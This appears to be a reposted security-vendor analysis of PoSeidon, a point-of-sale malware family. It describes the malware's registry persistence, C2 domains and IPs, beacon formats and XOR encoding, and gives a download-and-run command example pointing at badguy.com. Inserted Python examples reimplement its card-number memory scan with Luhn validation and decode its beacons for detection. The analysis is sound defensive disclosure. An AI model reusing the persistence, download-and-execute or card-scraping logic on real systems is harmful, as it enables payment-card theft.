PoSeidon: the most complex PoS malware so far

Source: Internet
Author: User
Tags: cisco, security

Cisco Security Solutions (CSS) researchers recently discovered PoSeidon, a new malware family targeting point-of-sale (PoS) systems. It is extremely sophisticated and has been called the most complex PoS malware seen so far.

Customers may use a PoS system when purchasing products at retail stores. If they pay with a credit or debit card, the PoS system reads the information stored on the magnetic stripe on the back of the card. Once this information is stolen from the merchant, it can be encoded onto the magnetic stripe of a new, counterfeit card. Such information is sold on the black market because attackers can easily monetize stolen credit card data. The number of incidents involving PoS malware has been rising, affecting both large companies and small family-run shops, and attracting wide media attention. Precisely because they hold large amounts of financial and personal information, these companies and their PoS systems will remain very attractive targets for attackers.

Overview

Today we introduce a new piece of malware for PoS systems. It searches PoS memory for credit card information and sends that information to servers under .ru top-level domains, where it may be resold. The components of this new malware family, which we call PoSeidon, are described below.

First, the Loader runs; it attempts to persist on the target system so that it survives a reboot. The Loader then contacts a command and control server to receive a URL pointing to another binary, which it downloads and executes. That downloaded program, FindStr, installs a keylogger and scans the PoS device's memory for digit sequences that could be credit card numbers. If these numbers are verified as genuine card numbers, the keystroke log and the card numbers are encoded and sent to an exfiltration server.

Technical details

Keyboard Recorder

The SHA256 hash of this file serves as its signature; the file may be the initial entry point of the PoS system attacks. We call it KeyLogger based on its debug information.

Once executed, this file copies itself to %SystemRoot%\system32\<filename>.exe or %UserProfile%\<filename>.exe and adds a registry entry under HKLM (or HKCU)\Software\Microsoft\Windows\CurrentVersion\Run.

The file also opens HKCU\Software\LogMeIn Ignition, reads and then deletes the PasswordTicket value, reads the Email value, and deletes the registry subtree HKCU\Software\LogMeInIgnition\<key>\Profiles\*.

The file sends data with the POST method to one of the following URIs:

wondertechmy[.]com/pes/viewtopic.php
wondertechmy[.]ru/pes/viewtopic.php
wondwondnew[.]ru/pes/viewtopic.php

The URI format is:

uid=%I64u&win=%d.%d&vers=%s

The keylogger component is used to steal passwords and may also be the initial vector by which the machines are infected.

Loader

We call this file Loader based on its debug information.

After the Loader runs, it checks whether it is executing under one of the following two file names:

WinHost.exe
WinHost32.exe

If not, it first makes sure that no Windows service named WinHost is running. The Loader then copies itself to %SystemRoot%\System32\WinHost.exe, overwriting any existing file of that name, and starts a service named WinHost.

This is done so that it remains in memory even after the current user logs out. If the Loader cannot install itself as a service, it terminates any other instances of itself in memory, copies itself to %UserProfile%\WinHost32.exe and installs the registry value HKCU\Microsoft\Windows\CurrentVersion\Run\WinHost32. Finally, it launches %UserProfile%\WinHost32.exe as a new process.

Now that it is persistent on the system, the Loader runs the following command to delete its original file:

cmd.exe /c del <path_to_itself> >> NUL

The Loader instance running in memory then tries to read the configuration file %SystemRoot%\System32\WinHost.exe.cfg. This file contains a list of URLs, which is appended to the URL list hard-coded into the Loader.

Then the Loader contacts one of the hard-coded C&C servers:

linturefa.com
xablopefgr.com
tabidzuwek.com
lacdileftre.ru
tabidzuwek.com
xablopefgr.com
lacdileftre.ru
weksrubaz.ru
linturefa.ru
mifastubiv.ru
xablopefgr.ru
tabidzuwek.ru

Corresponding IP addresses:

151.236.11.167
185.13.32.132
185.13.32.48
REDACTED at request of Federal Law Enforcement
31.184.192.196
91.220.131.116
91.220.131.87

If one of the above domain names resolves to an IP address, the program sends an HTTP POST request using the following User-Agent string:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

The POST data is sent to:

<IP ADDRESS>/ldl01/viewtopic.php
<IP ADDRESS>/pes2/viewtopic.php

The POST data format is:

uid=%I64u&uinfo=%s&win=%d.%d&bits=%d&vers=%s&build=%s

The Loader expects a response from the C&C server in the following form:

{<CommandLetter>:<parameter (ArgumentString)>}

Examples:

{R:http://badguy.com/malwarefilename.exe}
{b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}

The executable named in the server response is downloaded and executed; this is the second part of PoSeidon.

FindStr

We call this file FindStr based on its debug information.

This file installs a very small keylogger in the system, very similar to the one described earlier. The data captured by this keylogger is sent to the server later.

The malware then looks for specific digit sequences in memory:

16-digit numbers that start with 6, 5 or 4 (Discover, Visa and Mastercard credit cards), and numbers that start with 3 (AMEX credit cards)

It then uses the Luhn algorithm to verify that these candidates are genuine credit or debit card numbers.
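As an added example (not code from the page or from Cisco), here is the candidate scan and Luhn check just described, run over a constructed memory buffer; a DLP scanner, or an analyst confirming whether a recovered dump held real card numbers, performs the same two steps. It assumes AMEX numbers are 15 digits, a detail the page does not spell out, and uses publicly known test card numbers as sample input.

```python
import re

# Added example, not from the page or from Cisco: the prefix scan and Luhn
# check described above, applied to a constructed buffer.
# Assumption beyond the page: AMEX numbers are 15 digits long.

# 16-digit runs starting with 4, 5 or 6 (Visa, Mastercard, Discover) and
# 15-digit runs starting with 3 (AMEX), not embedded in a longer digit run.
CANDIDATE_RE = re.compile(rb"(?<!\d)(?:[456]\d{15}|3\d{14})(?!\d)")

def luhn_valid(digits: str) -> bool:
    """Luhn (mod 10) check: from the right, double every second digit,
    subtract 9 from any product above 9, and require the sum to be 0 mod 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def card_brand(digits: str) -> str:
    """Brand by leading digit, following the page's mapping."""
    first = digits[0]
    if first == "3":
        return "AMEX"
    if first == "4":
        return "Visa"
    if first == "5":
        return "Mastercard"
    return "Discover"

def scan_buffer(buf: bytes) -> list:
    """Return (offset, number, brand) for every Luhn-valid candidate in buf."""
    hits = []
    for m in CANDIDATE_RE.finditer(buf):
        num = m.group().decode("ascii")
        if luhn_valid(num):
            hits.append((m.start(), num, card_brand(num)))
    return hits

# Constructed sample buffer: track-2-style data with a Visa test number, an
# AMEX and a Discover test number, a 16-digit run that fails Luhn, and a
# 16-digit run buried in a longer digit string (rejected by the lookarounds).
SAMPLE_BUFFER = (
    b"\x00\x00;4111111111111111=2512101?\x00"
    b"ORDER 340000000000009 OK\n"
    b"6011000000000004 tender\n"
    b"4111111111111112 junk\n"
    b"98765432101234567890 not a card\n"
)

if __name__ == "__main__":
    for off, num, brand in scan_buffer(SAMPLE_BUFFER):
        masked = num[:6] + "*" * (len(num) - 10) + num[-4:]
        print(f"offset {off}: {brand} {masked}")
```

Masking the output to the first six and last four digits keeps the analyst's own report from becoming a second copy of the card data.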

Next, it tries to resolve the following domain names, some of which are known data-theft servers:

quartlet.com
horticartf.com
kilaxuntf.ru
dreplicag.ru
fimzusoln.ru
wetguqan.ru

If one of the above domain names resolves to an IP address, the program sends an HTTP POST request using the following User-Agent string:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

The POST data is sent to:

<IP ADDRESS>/pes13/viewtopic.php

Data format:

oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s

Optional POST data (data: credit card numbers; logs: keystroke log data):

&data=<XOR with 0x2A, base64 encoded data>&logs=<XOR with 0x2A, base64 encoded data>

The credit card numbers and keylogger data sent to the server are thus XOR-encoded with 0x2A and base64-encoded.
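The following is an added example, not code from the page or from Cisco, that decodes the FindStr POST body described above (data and logs fields XOR-ed with 0x2A and base64-encoded) and parses the Loader's {<CommandLetter>:<argument>} response format from the earlier section. The paths, field names, key byte and response example come from the page; the proxy-log layout, the body splitting and the sample beacon are constructed assumptions. The page does not say whether XOR or base64 is applied first; XOR first is assumed here, and the decoder reverses that order.

```python
import base64
import re

# Added example, not code from the page or from Cisco. Assumptions: XOR is
# applied before base64, and a proxy log yields (method, path, body) tuples.
XOR_KEY = 0x2A
BEACON_PATHS = ("/pes/viewtopic.php", "/ldl01/viewtopic.php",
                "/pes2/viewtopic.php", "/pes13/viewtopic.php")

def encode_field(raw: bytes) -> str:
    """XOR every byte with 0x2A, then base64 (used here only to build the sample)."""
    return base64.b64encode(bytes(b ^ XOR_KEY for b in raw)).decode("ascii")

def decode_field(encoded: str) -> bytes:
    """Reverse it: base64-decode, then XOR with 0x2A again (XOR is its own inverse)."""
    return bytes(b ^ XOR_KEY for b in base64.b64decode(encoded))

def split_body(body: str) -> dict:
    """Split key=value&... without URL-decoding, so base64 '+' and '=' survive."""
    fields = {}
    for pair in body.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            fields[key] = value
    return fields

def decode_beacon(body: str) -> dict:
    """Return the beacon fields with the data/logs payloads decoded to text."""
    fields = split_body(body)
    for name in ("data", "logs"):
        if name in fields:
            fields[name] = decode_field(fields[name]).decode("latin-1")
    return fields

def is_poseidon_beacon(method: str, path: str, body: str) -> bool:
    """Network detection rule: POST to a known viewtopic.php path with a uid= field."""
    return method == "POST" and path in BEACON_PATHS and "uid=" in body

C2_CMD_RE = re.compile(r"\{([A-Za-z]):([^}]*)\}")

def parse_c2_response(resp: str) -> list:
    """Turn '{R:url}{b:name|num|url}' into [(letter, [arg, ...]), ...]."""
    return [(letter, arg.split("|")) for letter, arg in C2_CMD_RE.findall(resp)]

# Constructed sample: one FindStr beacon carrying a public test card number and
# a short keystroke log, plus two non-matching requests for contrast.
SAMPLE_BODY = ("oprat=2&uid=1234567890&uinfo=POS-LANE-1&win=6.1&vers=7.1"
               + "&data=" + encode_field(b"4111111111111111")
               + "&logs=" + encode_field(b"admin\tP@ssw0rd\r"))

SAMPLE_LOG = [
    ("POST", "/pes13/viewtopic.php", SAMPLE_BODY),
    ("POST", "/forum/viewtopic.php", "t=42&msg=hello"),
    ("GET", "/pes13/viewtopic.php", ""),
]

# Loader response example as given on the page.
SAMPLE_C2_RESPONSE = ("{R:http://badguy.com/malwarefilename.exe}"
                      "{b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}")

def triage(log: list) -> list:
    """Decode every request in the log that matches the beacon rule."""
    return [decode_beacon(body) for method, path, body in log
            if is_poseidon_beacon(method, path, body)]

if __name__ == "__main__":
    for beacon in triage(SAMPLE_LOG):
        print(beacon)
    print(parse_c2_response(SAMPLE_C2_RESPONSE))
```

Splitting the body by hand rather than with a URL-decoding parser matters: base64 output contains '+' and '=' characters that a generic query-string parser would turn into spaces or drop, corrupting the payload before it is decoded.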

The server responds with commands; this mechanism allows the malware to update itself based on the commands it receives from the server.

Loader vs FindStr

BinDiff was used to compare the unpacked Loader (version 11.4) with the unpacked FindStr (version 7.1). The result shows that 62% of the functions are identical. The attackers behind the malware probably developed a set of core functions and compiled them into a library that their other projects can use directly.

IOC

Endpoint IOC files:

Win.Trojan.PoSeidon.RegistryItem.ioc
Win.Trojan.PoSeidon.ProcessItem.ioc
Win.Trojan.PoSeidon.FileItem.ioc

Domain names:

linturefa.com
xablopefgr.com
tabidzuwek.com
linturefa.ru
xablopefgr.ru
tabidzuwek.ru
weksrubaz.ru
mifastubiv.ru
lacdileftre.ru
quartlet.com
horticartf.com
kilaxuntf.ru
dreplicag.ru
fimzusoln.ru
wetguqan.ru

IP addresses:

151.236.11.167
185.13.32.132
185.13.32.48
REDACTED at request of Federal Law Enforcement
31.184.192.196
91.220.131.116
91.220.131.87
REDACTED at request of Federal Law Enforcement

Conclusion

PoSeidon is another malware family targeting PoS systems, and it shows considerable technical skill. Attackers will keep going after PoS systems and will use a variety of obfuscation techniques to evade detection. As long as PoS attacks remain profitable, attackers will continue to develop new malware. Network administrators should stay vigilant and deploy the best available protections against this kind of malware.
